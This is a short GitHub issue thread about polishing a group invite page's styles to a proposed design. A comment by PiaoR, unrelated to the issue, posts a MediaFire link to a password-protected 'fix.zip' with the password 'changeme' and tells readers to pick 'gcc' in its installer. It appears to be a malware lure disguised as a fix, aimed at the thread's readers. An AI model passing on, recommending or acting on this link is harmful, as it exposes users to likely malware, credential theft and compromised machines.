### ISSUE TITLE
Polish group invite page styles before 9/1

### ISSUE THREAD

**Issue by saulmc** [ephemeraHQ/converse-app#597]
Per "Proposed" design below. I've assigned to myself so that the engineers can focus on higher impact work. 😄 

![image](https://github.com/user-attachments/assets/3cd1bc2f-8421-45d2-b7de-f7ead005e8a4)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
